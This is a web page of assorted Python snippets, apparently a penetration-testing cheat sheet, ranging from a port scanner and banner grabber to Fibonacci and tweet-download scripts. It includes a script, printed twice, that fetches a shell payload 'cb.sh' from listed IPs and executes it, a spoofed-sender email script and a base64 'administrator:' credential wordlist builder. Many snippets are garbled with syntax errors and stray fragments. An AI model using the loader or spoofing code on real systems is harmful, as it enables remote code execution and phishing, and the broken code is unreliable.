Python Scripts
(Updated: 2019-09-03) - 
Python Port Scanner - 
Base 64 WordList - 
Windows Registry - 
Search Files for Regex - 
SSL HTTP Server - 
HTTP Server - 
Email Sender - 
IP List Loop - 
HTTP Banner Grabber
Python Port Scanner
import socket as sk
for port in range(1,1024):
  try:
    s=sk.socket(sk.AF_INET,sk.SOCK_STREAM) 
    s.settimeout(1000)
    s.connect(('127.0.0.11,port))
    print '%d:OPEN' % (port) 
    s.close
  except: continue 
Top - 
Home
 
Base 64 WordList
#!/usr/bin/python
import base64 
file1=open ("pwd.1st","r") 
file2=open ("b64pwds.1st","w") 
for line in filel :
  clear = "administrator:" + str. strip (line) 
  new = base64 .encodestring (clear) 
  file2. write (new) 
Top - 
Home
 
CONVERT WINDOWS REGISTRY HEX FORMAT TO READABLE ASCII
import binascii, sys, string
dataFormatHex = binascii.a2b_hex(sys.argv[1]) 
output = "" 
for char in dataFormatHex:
  if char in string.printable: output += char
  else: output += "." 
print "\n" + output 
Top - 
Home
 
Search Files for RegEx
import glob, re 
for msg in glob.glob('/tmp/*.txt'): 
  filer = open((msg),'r')
  data = filer.read() 
  message = re.findall(r'[message](.*?)>/message>', data,re.DOTALL)
  print "File %s contains %s" % (str(msg),message) 
  filer. Close()
Top - 
Home
 
SSL HTTP Server
# Create SSL cert (follow prompts for customization)
> openssl req -new -x509 -keyout cert.pem -out cert.pm -days 365 -nodes
# Create httpserver.py 
import BaseHTTPServer,SimpleHTTPServer,ssl
cert = "cert.pem"
data,re.DOTALL) 
http = BaseHTTPServer.HTTPServer((192.168.1.10',443), 
SimpleHTTPServer.SimpleHTTPRequestHandler) 
httpd.socket = ssl.wrap_socket(httpd.socket,certfile=cert,server_side=True)
httpd.serve_forever()
Top - 
Home
 
HTTP Server
> python -m SimpleHTTPServer 8080
Top - 
Home
 
PYTHON EMAIL SENDER (* SENDMAIL MUST BE INSTALLED)
#!/usr/bin/python
import smtplib, string 
import os, time 
os.system("/etc/init.d/sendmail start") 
time.sleep(4) 
HOST = "localhost" 
SUBJECT = "Email from spoofed sender"
TO = "target@you.com" 
FROM = "spoof@spoof.com" 
TEXT = "Message Body"
BODY = string.join(( 
  "From: %s" % FROM,
  "To: %s" % TO,
  "Subject: %s" % SUBJECT , 
  "", 
  TEXT
  ), "\r\n")
server = smtplib.SMTP(HOST)
server.sendmail(FROM, [TO], BODY)
server.quit() 
time.sleep(4) 
os.system("/etc/init.d/sendmail stop")
LOOP THROUGH IP LIST, DOWNLOAD FILE OVER HTTP AND EXECUTE 
#!/usr/bin/python 
import urllib2, os
urls = ["1.1.1.1","2.2.2.2"]
port = "80" 
payload = "cb.sh"
for url in urls:
  u = "http://%s:%s/%s" % (url, port, payload)
  try: 
    r = urllib2.urlopen(u) 
    wfile = open("/tmp/cb.sh","wb") 
    wfile.write(r.read()) 
    wfile.close() 
    break
  except: continue
if os.path.exists("/tmp/cb.sh"): 
  os.system("chmod 700 /tmp/cb.sh") 
  os.system("/tmp/cb.sh") 
Top - 
Home
 
LOOP THROUGH IP LIST, DOWNLOAD FILE OVER HTTP AND EXECUTE
#!/usr/bin/python 
import urllib2, os 
urls = ["1.1.1.1","2.2.2.2"] 
port = "80" 
payload = "cb.sh"
for url in urls: 
  u = "http://%s:%s/%s" % (url, port, payload)
  try: 
    r = urllib2.urlopen(u) 
    wfile = open("/tmp/cb.sh","wb")
    wfile.write(r.read()) 
    wfile.close() 
    break
  except: continue 
if os.path.exists("/tmp/cb.sh"):
  os.system("chmod 700 /tmp/cb.sh") 
  os.system("/tmp/cb.sh")
Top - 
Home
 
PYTHON HTTP BANNER GRABBER (* TAKES AN IP RANGE , PORT , AND PACKET DELAY)
#!/usr/bin/python
import urllib2 , sys, time 
from optparse import OptionParser 
parser = OptionParser() 
parser.add_option("-t", dest="iprange",help="target IP range, i.e. 192.168.1.1-25") 
parser.add_option("-p", dest="port",default="80",help="port, default=80")
parser.add_option("-d", dest="delay",default=".5",help='delay (in seconds), default=.5 seconds")
(opts, args) = parser.parse_args() 
if opts .iprange is None : 
  parser.error ("you must supply an IP range") 
ips = []
headers = {} 
octets = opts.iprange.split('.)
start = octets[3].split('-')[0] 
stop = octets[3].split('-')[1]
for i in range(int(start),int(stop)+1):
  ips.append %s.%s.%s%d % (octets[0],octets[1],octets[2],i))
print '\nScanning IPs: %s\n' % (ips)
for ip in ips: 
  try: 
    response = urllib2.urlopen(http://%s:%s % (ip,opts.port))
    headers[ip] = dict(response.info())
  except Exception as e:
    headers[ip] = "Error: " + str(e)
  time.sleep(float(opts.delay))
for header in headers:
  try:
    print '%s : %s' % (header,headers[header].get('server1'))
  except:
    print '%s : %s' % (header,headers[header])
Top - 
Home
 
Monitor Apache IPs
ips = {}
fh = open("/var/log/nginx/access.log", "r").readlines()
for line in fh:
    ip = line.split(" ")[0]
    if 6 < len(ip) <=15:
        ips[ip] = ips.get(ip, 0) + 1
print ips
 
IP WHOIS
import json
from random import randint
import socket
import struct
import sys
from docopt import docopt
import ipcalc
from ipwhois import IPWhois
import gevent
from pyelasticsearch import ElasticSearch
from pyelasticsearch.exceptions import \
     ElasticHttpError, ElasticHttpNotFoundError
import requests
def ip2long(ip):
        
        # Convert IPv4 address in string format into an integer
        :param str ip: ipv4 address
        :return: ipv4 address
        :rtype: integer
        
        packed_ip = socket.inet_aton(ip)
        return struct.unpack("!L", packed_ip)[0]
def get_next_ip(ip_address):
    
    :param str ip_address: ipv4 address
    :return: next ipv4 address
    :rtype: str
    >>> get_next_ip('0.0.0.0')
    '0.0.0.1'
    >>> get_next_ip('24.24.24.24')
    '24.24.24.25'
    >>> get_next_ip('24.24.255.255')
    '24.25.0.0'
    >>> get_next_ip('255.255.255.255') is None
    True
    
    assert ip_address.count('.') == 3, \
           'Must be an IPv4 address in str representation'
    if ip_address == '255.255.255.255':
        return None
    try:
        return socket.inet_ntoa(struct.pack('!L', ip2long(ip_address) + 1))
    except Exception, error:
        print 'Unable to get next IP for %s' % ip_address
        raise error
def get_netrange_end(asn_cidr):
    
    :param str asn_cidr: ASN CIDR
    :return: ipv4 address of last IP in netrange
    :rtype: str
    
    try:
        last_in_netrange = \
            ip2long(str(ipcalc.Network(asn_cidr).host_first())) + \
            ipcalc.Network(asn_cidr).size() - 2
    except ValueError, error:
        print 'Issue calculating size of %s network' % asn_cidr
        raise error
    return socket.inet_ntoa(struct.pack('!L', last_in_netrange))
def get_next_undefined_address(ip):
    
    # Get the next non-private IPv4 address if the address sent is private
    :param str ip: IPv4 address
    :return: ipv4 address of net non-private address
    :rtype: str
    >>> get_next_undefined_address('0.0.0.0')
    '1.0.0.0'
    >>> get_next_undefined_address('24.24.24.24')
    '24.24.24.24'
    >>> get_next_undefined_address('127.0.0.1')
    '128.0.0.0'
    >>> get_next_undefined_address('255.255.255.256') is None
    True
    
    try:
        # Should weed out many invalid IP addresses
        ipcalc.Network(ip)
    except ValueError, error:
        return None
    defined_networks = (
        '0.0.0.0/8',
        '10.0.0.0/8',
        '127.0.0.0/8',
        '169.254.0.0/16',
        '192.0.0.0/24',
        '192.0.2.0/24',
        '192.88.99.0/24',
        '192.168.0.0/16',
        '198.18.0.0/15',
        '198.51.100.0/24',
        '203.0.113.0/24',
        '224.0.0.0/4',
        '240.0.0.0/4',
        '255.255.255.255/32',
    )
    for network_cidr in defined_networks:
        if ip in ipcalc.Network(network_cidr):
            return get_next_ip(get_netrange_end(network_cidr))
    return ip
def break_up_ipv4_address_space(num_threads=8):
    
    >>> break_up_ipv4_address_space() == \
     [('0.0.0.0', '31.255.255.255'), ('32.0.0.0', '63.255.255.255'),\
     ('64.0.0.0', '95.255.255.255'), ('96.0.0.0', '127.255.255.255'),\
     ('128.0.0.0', '159.255.255.255'), ('160.0.0.0', '191.255.255.255'),\
     ('192.0.0.0', '223.255.255.255'), ('224.0.0.0', '255.255.255.255')]
    True
    
    ranges = []
    multiplier = 256 / num_threads
    for marker in range(0, num_threads):
        starting_class_a = (marker * multiplier)
        ending_class_a = ((marker + 1) * multiplier) - 1
        ranges.append(('%d.0.0.0' % starting_class_a,
                       '%d.255.255.255' % ending_class_a))
    return ranges
def get_netranges(starting_ip='1.0.0.0',
                  last_ip='2.0.0.0',
                  elastic_search_url='http://127.0.0.1:9200/',
                  index_name='netblocks',
                  doc_name='netblock', sleep_min=1, sleep_max=5):
    connection = ElasticSearch(elastic_search_url)
    current_ip = starting_ip
    while True:
        # See if we've finished the range of work
        if ip2long(current_ip) > ip2long(last_ip):
            return
        current_ip = get_next_undefined_address(current_ip)
        if current_ip == None: # No more undefined ip addresses
            return
        print current_ip
        try:
            whois_resp = IPWhois(current_ip).lookup_rws()
        except Exception as error:
            """
            If a message like: 'STDERR: getaddrinfo(whois.apnic.net): Name or
            service not known' appears' then print it out and try the next
            IP address.
            """
            print type(error), error
            current_ip = get_next_ip(current_ip)
            if current_ip is None:
                return # No more undefined ip addresses
            gevent.sleep(randint(sleep_min, sleep_max))
            continue
        if 'asn_cidr' in whois_resp and \
            whois_resp['asn_cidr'] is not None and \
            whois_resp['asn_cidr'].count('.') == 3:
            last_netrange_ip = get_netrange_end(whois_resp['asn_cidr'])
        else:
            try:
                last_netrange_ip = \
                    whois_resp['nets'][0]['range'].split('-')[-1].strip()
                assert last_netrange_ip.count('.') == 3
            except:
                # No match found for n + 192.0.1.0.
                print 'Missing ASN CIDR in whois resp: %s' %  whois_resp
                current_ip = get_next_ip(current_ip)
                if current_ip is None:
                    return # No more undefined ip addresses
                gevent.sleep(randint(sleep_min, sleep_max))
                continue
        assert last_netrange_ip is not None and \
               last_netrange_ip.count('.') == 3, \
               'Unable to find last netrange ip for %s: %s' % (current_ip,
                                                               whois_resp)
        # Save current_ip and whois_resp
        entry = {
            'netblock_start': current_ip,
            'netblock_end': last_netrange_ip,
            'block_size': ip2long(last_netrange_ip) - ip2long(current_ip) + 1,
            'whois': json.dumps(whois_resp),
        }
        keys = ('cidr', 'name', 'handle', 'range', 'description',
                'country', 'state', 'city', 'address', 'postal_code',
                'abuse_emails', 'tech_emails', 'misc_emails', 'created',
                'updated')
        for _key in keys:
            entry[_key] = str(whois_resp['nets'][0][_key]) \
                          if _key in whois_resp['nets'][0] and \
                             whois_resp['nets'][0][_key] else None
            if _key == 'city' and entry[_key] and ' ' in entry[_key]:
                entry[_key] = entry[_key].replace(' ', '_')
        try:
            connection.index(index_name, doc_name, entry)
        except ElasticHttpError, error:
            print 'At %s. Unable to save record: %s' % (current_ip, entry)
            raise error
        current_ip = get_next_ip(last_netrange_ip)
        if current_ip is None:
            return # No more undefined ip addresses
        gevent.sleep(randint(sleep_min, sleep_max))
def stats(elastic_search_url, index_name, doc_name):
    fields = ('country', 'city')
    url = '%s/%s/_search?fields=aggregations' % (elastic_search_url, index_name)
    for field in fields:
        data = {
            "aggs": {
                field: {
                    "terms": {
                        "field": field,
                        "order": {"total_ips": "desc"}
                    },
                    "aggs": {
                        "total_ips": {"sum": {"field": "block_size"}}
                    }
                }
            }
        }
        resp = requests.get(url, data=json.dumps(data))
        assert resp.status_code == 200, \
            'Did not get HTTP 200 back: %s' % resp.status_code
        _stats = json.loads(resp.content)["aggregations"][field]["buckets"]
        _stats = {stat['key']: int(stat['total_ips']['value'])
                  for stat in _stats}
        print 'Top 10 netblock locations by %s' % field
        for _key in sorted(_stats, key=_stats.get, reverse=True):
            print "{:14,d}".format(_stats[_key]), _key.replace('_', ' ')
        print
def main(argv):
    """
    :param dict argv: command line arguments
    """
    opt = docopt(__doc__, argv)
    if opt['collect']:
        sleep_min = int(opt['--sleep_min']) \
                    if opt['--sleep_min'] is not None else randint(1, 5)
        sleep_max = int(opt['--sleep_max']) \
                    if opt['--sleep_max'] is not None else randint(1, 5)
        num_threads = int(opt['--threads'])
        if sleep_min > sleep_max:
            sleep_min, sleep_max = sleep_max, sleep_min
        threads = [gevent.spawn(get_netranges, starting_id, ending_ip,
                   opt['<elastic_search_url>'], opt['<index_name>'],
                   opt['<doc_name>'], sleep_min, sleep_max)
                   for starting_id, ending_ip in
                   break_up_ipv4_address_space(num_threads)]
        gevent.joinall(threads)
    if opt['stats']:
        stats(opt['<elastic_search_url>'],
              opt['<index_name>'],
              opt['<doc_name>'])
    if opt['test']:
        import doctest
        doctest.testmod()
if __name__ == "__main__":
    try:
        main(sys.argv[1:])
    except KeyboardInterrupt:
        pass
 
Download Tweets
#!/usr/bin/env python
# encoding: utf-8
import tweepy #https://github.com/tweepy/tweepy
import csv
#Twitter API credentials
consumer_key = ""
consumer_secret = ""
access_key = ""
access_secret = ""
def get_all_tweets(screen_name):
  #Twitter only allows access to a users most recent 3240 tweets with this method
  
  #authorize twitter, initialize tweepy
  auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
  auth.set_access_token(access_key, access_secret)
  api = tweepy.API(auth)
  
  #initialize a list to hold all the tweepy Tweets
  alltweets = []  
  
  #make initial request for most recent tweets (200 is the maximum allowed count)
  new_tweets = api.user_timeline(screen_name = screen_name,count=200)
  
  #save most recent tweets
  alltweets.extend(new_tweets)
  
  #save the id of the oldest tweet less one
  oldest = alltweets[-1].id - 1
  
  #keep grabbing tweets until there are no tweets left to grab
  while len(new_tweets) > 0:
    print "getting tweets before %s" % (oldest)
    
    #all subsiquent requests use the max_id param to prevent duplicates
    new_tweets = api.user_timeline(screen_name = screen_name,count=200,max_id=oldest)
    
    #save most recent tweets
    alltweets.extend(new_tweets)
    
    #update the id of the oldest tweet less one
    oldest = alltweets[-1].id - 1
    
    print "...%s tweets downloaded so far" % (len(alltweets))
  
  #transform the tweepy tweets into a 2D array that will populate the csv 
  outtweets = [[tweet.id_str, tweet.created_at, tweet.text.encode("utf-8")] for tweet in alltweets]
  
  #write the csv  
  with open('%s_tweets.csv' % screen_name, 'wb') as f:
    writer = csv.writer(f)
    writer.writerow(["id","created_at","text"])
    writer.writerows(outtweets)
  
  pass
if __name__ == '__main__':
  #pass in the username of the account you want to download
get_all_tweets("thealicesmith")
 
Current Date and Time
import datetime
now = datetime.datetime.now()
print
print "Current date and time using str method of datetime object:"
print str(now)
print
print "Current date and time using instance attributes:"
print "Current year: %d" % now.year
print "Current month: %d" % now.month
print "Current day: %d" % now.day
print "Current hour: %d" % now.hour
print "Current minute: %d" % now.minute
print "Current second: %d" % now.second
print "Current microsecond: %d" % now.microsecond
print
print "Current date and time using strftime:"
print now.strftime("%Y-%m-%d %H:%M")
 
Check Log File
#!/usr/bin/env python
logfile = open("/var/log/syslog", "r")
for line in logfile:
    line_split = line.split()
    print line_split
    list = line_split[0], line_split[1], line_split[2], line_split[4]
    print list
 
All WHOIS
# Uses pyWhois to parse WHOIS database for entered domain
import whois
# Test for entered arguments, else ask for domain
data = sys.argv[1]
if len(data) < 5:
  while True:
    try:
      data = input("Enter a domain: ")
    except ValueError:
      print("Please, enter a domain name: ")
      continue
    else:
      break
print ("Checking WHOIS Information for ", data," ...")
# Query pyWhois for information
w = whois.whois(data)
print("Domain Name: ", whois.domain_name)
print("Expiration Date: ", whois.expiration_date)
# Print important information
#
#
# import whois
# w = whois.whois('yourmom.com')
# print w
# Output will look like
# creation_date: [datetime.datetime(2012, 9, 15, 0, 0), '15 Sep 2012 20:41:00']
# domain_name: ['YOURMOM.COM', 'yourmom.com']
# updated_date: 2013-08-20 00:00:00
# whois_server: whois.enom.com
# print w.expiration_date 
# print w.text
 
Fibonacci
# Program to display the Fibonacci sequence up to n-th term where n is provided by the user
# change this value for a different result
nterms = 100
# uncomment to take input from the user
#nterms = int(input("How many terms? "))
# first two terms
n1 = 0
n2 = 1
count = 0
# check if the number of terms is valid
if nterms <= 0:
  print("Please enter a positive integer")
elif nterms == 1:
  print("Fibonacci sequence up to",nterms,":")
  print(n1)
else:
  print("Fibonacci sequence up to",nterms,":")
  while count < nterms:
    print(n1,end=' , ')
    nth = n1 + n2
    # update values
    n1 = n2
    n2 = nth 
    count += 1
 
How to Sleep (Sample)
# How to sleep for 5 seconds in python:
import time
time.sleep(5)
# How to sleep for 0.5 seconds in python:
import time
time.sleep(0.5)
 
Search Twitter
#Importing the modules
import urllib2
import json
screen_name = "wordpress"
url = "http://api.twitter.com/1/statuses/user_timeline.json?screen_name=" + screen_name
data = json.load(urllib2.urlopen(url))
print len(data), "tweets"
for tweet in data:
    print tweet['text']